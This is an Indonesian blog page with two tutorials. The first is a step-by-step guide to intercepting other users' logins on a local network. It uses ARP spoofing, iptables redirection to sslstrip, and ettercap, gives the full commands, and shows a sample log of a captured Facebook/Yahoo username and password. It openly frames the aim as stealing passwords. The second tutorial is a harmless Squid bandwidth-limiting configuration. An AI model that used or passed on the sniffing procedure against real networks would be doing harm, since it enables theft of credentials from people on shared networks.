Rabu, 04 Agustus 2010

Sniffing Jaringan dengan SSL (https,http) 100%

Mungkin kalian sudah tau tentang apa itu sniffing, sniffing atau dengan kata lainnya penyadapan paket yang lewat dalam jaringan. jadi ketika user & password yang lewat dalam jaringan bisa berbahaya..... wauuuuu ganas juga yah :p. berarti kita dapat menyadap (mencuri) user & password (facebook,yahoo,etc) dalam jaringan.
Saya menggunakan OS Backtrack 4 Final dan aplikasi Ettercap, SSLSTRIP, ARPSpoof,IPTABLES jika belum ada silahkan cari di google n download
Ok langsung aja ke Tekniknya :
1. Kopi Cappucino, Rokok Sampoerna, n Koneksi Jaringan dengan kecepatan 1 Gbp/s :p
2. Edit File /etc/etter.conf
root@bt:~# kwrite /etc/etter.conf

Cari bagian ini
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Kemudian Hilangkan tanda # seperti ini :
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

3. Aktifkan IP Forward
echo 1 > /proc/sys/net/ipv4/ip_forward

4. Redirect port 80 ke port 10000 (sslstrip)
root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

5. Ok sekarang jalankan ArpSpoofing
Contoh
Target : 192.168.2.105
Gateway : 192.168.2.244

root@bt:~# arpspoof -i wlan0 -t 192.168.2.105 192.168.2.244

6. Kemudian Jalankan SSLSTRIP
root@bt:~# sslstrip -a -k -f

7. Ok langkah Terakhir Jalankan ettercap
root@bt:~# ettercap -T -q -i wlan0

Untuk melihat User dan passsword target ketika login (facebook,yahoo,etc) liat pada tab ettercap seperti ini, n jangan di close :
root@bt:~# ettercap -T -q -i wlan0

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on wlan0... (Ethernet)

wlan0 -> 00:17:C4:9E:FE:24 192.168.2.108 255.255.255.0

Privileges dropped to UID 65534 GID 65534...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.63.181.26:80 -> USER: [email]toovix07@yahoo.com[/email] PASS: (rahasia :p) INFO: [url]http://www.facebook.com/login.php?api_key=965dc598471b823e0da74090bfe054bc&v=1.0&next=http://facebook.poker.zynga.com/poker/playa.php?uid=10000119039[/url]


Ok sekian dulu Tutornya, Silahkan dicicipi :p

Manajemen Bandwith dengan squid

1. Membatasi Bandwith menggunakan class
Contoh Kasus :
a. Komputer Server (192.168.0.1) mendapat jatah unlimited bandwith
b. Komputer milik administrator (192.168.0.2) juga mendapat jatah unlimited bandwith
c. Komputer Manajer dengan ip address (192.168.0.10 , 192.168.0.12, 192.168.0.14) mendapat bandwith 1,5 kbytes/sec jika ukuran dile yang diakses
melebihi 64 kbyte.
d. Komputer Staff dengan ip address (192.168.0.20 s/d 192.168.0.30) mendapat bandwith 1 kbytes/sec jika ukura file yang diakses melebihi 32 kbyte.

Berikut implementasinya :
Tentukan Konfigurasi file squid.conf sebagai berikut :
acl all src 0.0.0.0/0.0.0.0
acl server src 192.168.0.1/32
acl admin src 192.168.0.2/32
acl manajer src 192.168.0.10 192.168.0.12 192.168.0.14
acl staff src 192.168.0.20-192.168.0.30

delay_pools 3

#untuk pool no 1 dan class no 1
delay_class 1 1
delay_parameters 1 -1/-1
delay_acces 1 allow admin
delay_acces 1 allow server
delay_acces 1 deny all

#untuk pool no 2 dan class no 1
delay_class 2 1
delay_parameters 2 1500/64000
delay_acces 2 allow manajer
delay_acces 2 deny all

#untuk pool no 3 dan class no 1
delay_class 3 1
delay_parameters 3 1000/32000
delay_acces 3 allow staff
delay_acces 3 deny all

2. Membatasi Bandwith download file tertentu
Contoh Kasus :
Misalkan kita berlangganan akses internet dari isp dengan bandwith sebesar 512 Kb. Bandwith sebesar itu dibagi ke beberapa komputer pada network
192.168.1.0/24 dengan aturan :
a. Batas kecepatan koneksi untuk semua 256 kbps
b. Batas kecepatan koneksi per-network 64 kbps
c. Batas kecepatan per-user/host 2 kbps jika digunakan untuk download file exe, mp3, zip, rar, avi
d. Batas kecepatan per-ser/host akan mengikuti kecepatan per-network jika user tidak mendownload file2 diatas.

Berikut implementasinya , Edit kembali file squid.conf
#Tambah acl untuk networknya
acl lokal 192.168.1.0/24

#Tentukan acl untuk tipe-tipe file
acl filelimit url_regex -i \.exe
acl filelimit url_regex -i \.mp3
acl filelimit url_regex -i \.zip
acl filelimit url_regex -i \.avi

delay_pools 2

#pembatasan bandwith jika user mendownload file diatas
delay_class 1 3
delay_parameters 1 32000/32000 8000/8000 250/250
delay_acces 1 allow lokal filelimit
delay_acces 1 deny all

#Keaturan bandwith pernetwork
delay_class 2 2
delay_parameters 2 32000/32000 8000/8000
delay_acces 2 allow lokal
delay_acces 2 deny all

Thank's Semoga Bermanfaat